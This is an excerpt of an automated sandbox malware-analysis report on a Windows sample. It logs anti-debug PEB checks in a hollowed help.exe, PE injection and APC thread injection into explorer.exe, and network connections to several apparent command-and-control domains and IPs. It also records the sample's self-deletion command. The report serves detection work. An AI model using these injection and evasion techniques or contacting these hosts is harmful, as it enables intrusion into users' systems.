          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_039F03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_039F03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_039F03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_03A8131B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_039CF358 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_039CDB40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_039F3B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_039F3B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_03A98B58 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_039CDB60 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_039FD294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_039FD294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_039DAAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_039DAAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_039FFAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_039C52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_039C52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_039C52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_039C52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_039C52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_039F2ACB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_039F2AE4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_039E3A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_039CAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_039CAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_03A04A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_03A04A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_039C5210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_039C5210 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_039C5210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_039C5210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_039D8A0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_03A8AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_03A8AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_03A7B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_03A7B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_03A98A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_03A0927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_039C9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_039C9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_039C9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_039C9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_03A54257 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_03A8EA55 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_03A469A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_039F2990 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_039FA185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_03A451BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_03A451BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_03A451BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_03A451BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_039EC182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_039F61A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_039F61A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_03A541E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_039CB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_039CB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_039CB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_039C9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_039C9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_039C9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_039F513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_039F513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_039E4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_039E4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_039E4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_039E4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_039E4120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_039EB944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_039EB944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_039CB171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_039CB171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_039CC962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_03A090AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_039C9080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_039FF0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_039FF0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_039FF0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_03A43884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_03A43884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_039F20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_039F20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_039F20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_039F20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_039F20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_039F20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_039C58EC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_03A5B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_03A5B8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_03A5B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_03A5B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_03A5B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_03A5B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_03A47016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_03A47016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_03A47016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_039F002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_039F002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_039F002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_039F002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_039F002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_039DB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_039DB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_039DB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_039DB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_03A94015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_03A94015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_039E0050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_039E0050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_03A82073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_03A91074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_039D8794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_03A47794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_03A47794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_03A47794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_03A037F5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_039EF716 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_039FA70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_039FA70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_03A9070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_03A9070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_039FE730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_039C4F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_039C4F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_03A5FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_03A5FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_03A98F6A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_039DEF40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_039DFF60 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_03A446A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_03A90EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_03A90EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_03A90EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_03A5FE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_039F36CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_03A7FEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_03A08EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_039D76E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_03A98ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_039F16E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_039FA61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_039FA61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_03A7FE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_039CC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_039CC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_039CC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_039F8E00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_03A81608 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_039CE620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_039D7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_039D7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_039D7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_039D7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_039D7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_039D7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_03A8AE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_03A8AE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_039EAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_039EAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_039EAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_039EAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_039EAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_039D766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_039FFD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_039FFD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_03A905AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_03A905AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_039C2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_039C2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_039C2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_039C2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_039C2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_039F2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_039F2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_039F2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_039F2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_039F1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_039F1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_039F1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_039F35A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_03A8FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_03A8FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_03A8FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_03A8FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_03A78DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_03A46DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_03A46DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_03A46DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_03A46DC9 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_03A46DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_03A46DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_039DD5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_039DD5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_03A8E539 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_03A4A537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_03A98D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_039F4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_039F4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_039F4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_039D3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_039D3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_039D3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_039D3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_039D3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_039D3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_039D3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_039D3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_039D3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_039D3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_039D3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeProcess token adjusted: Debug
          Source: C:\Windows\SysWOW64\help.exeProcess token adjusted: Debug
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeMemory allocated: page read and write | page guard

          HIPS / PFW / Operating System Protection Evasion:

          barindex
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeNetwork Connect: 104.21.65.7 80
          Source: C:\Windows\explorer.exeDomain query: www.hiddenwholesale.com
          Source: C:\Windows\explorer.exeDomain query: www.cleanxcare.com
          Source: C:\Windows\explorer.exeDomain query: www.biztekno.com
          Source: C:\Windows\explorer.exeDomain query: www.centergolosinas.com
          Source: C:\Windows\explorer.exeNetwork Connect: 44.227.65.245 80
          Source: C:\Windows\explorer.exeNetwork Connect: 192.169.223.13 80
          Source: C:\Windows\explorer.exeNetwork Connect: 198.185.159.144 80
          Source: C:\Windows\explorer.exeNetwork Connect: 151.106.118.75 80
          Source: C:\Windows\explorer.exeDomain query: www.69-1hn7uc.net
          Source: C:\Windows\explorer.exeDomain query: www.cyrilgraze.com
          Source: C:\Windows\explorer.exeDomain query: www.anewdistraction.com
          Source: C:\Windows\explorer.exeNetwork Connect: 163.43.122.119 80
          Source: C:\Windows\explorer.exeNetwork Connect: 78.31.67.91 80
          Injects a PE file into a foreign processesShow sources
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeMemory written: C:\Users\user\Desktop\SKlGhwkzTi.exe base: 400000 value starts with: 4D5A
          Maps a DLL or memory area into another processShow sources
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeSection loaded: unknown target: C:\Windows\SysWOW64\help.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeSection loaded: unknown target: C:\Windows\SysWOW64\help.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\help.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\help.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Modifies the context of a thread in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeThread register set: target process: 3424
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeThread register set: target process: 3424
          Source: C:\Windows\SysWOW64\help.exeThread register set: target process: 3424
          Queues an APC in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeThread APC queued: target process: C:\Windows\explorer.exe
          Sample uses process hollowing techniqueShow sources
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeSection unmapped: C:\Windows\SysWOW64\help.exe base address: F90000
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeProcess created: C:\Users\user\Desktop\SKlGhwkzTi.exe C:\Users\user\Desktop\SKlGhwkzTi.exe
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeProcess created: C:\Windows\SysWOW64\help.exe C:\Windows\SysWOW64\help.exe
          Source: C:\Windows\SysWOW64\help.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\SKlGhwkzTi.exe'
          Source: explorer.exe, 00000006.00000000.714835455.0000000000AD8000.00000004.00000020.sdmpBinary or memory string: ProgmanMD6
          Source: explorer.exe, 00000006.00000000.715332585.0000000001080000.00000002.00000001.sdmp, help.exe, 0000000D.00000002.919752559.00000000060F0000.00000002.00000001.sdmpBinary or memory string: Program Manager
          Source: explorer.exe, 00000006.00000000.715332585.0000000001080000.00000002.00000001.sdmp, help.exe, 0000000D.00000002.919752559.00000000060F0000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000006.00000000.715332585.0000000001080000.00000002.00000001.sdmp, help.exe, 0000000D.00000002.919752559.00000000060F0000.00000002.00000001.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000006.00000000.715332585.0000000001080000.00000002.00000001.sdmp, help.exe, 0000000D.00000002.919752559.00000000060F0000.00000002.00000001.sdmpBinary or memory string: Progmanlock
          Source: explorer.exe, 00000006.00000000.704737422.000000000A716000.00000004.00000001.sdmpBinary or memory string: Shell_TrayWnd5D
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Users\user\Desktop\SKlGhwkzTi.exe VolumeInformation
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Runtime.Remoting\v4.0_4.0.0.0__b77a5c561934e089\System.Runtime.Remoting.dll VolumeInformation
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeQueries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation
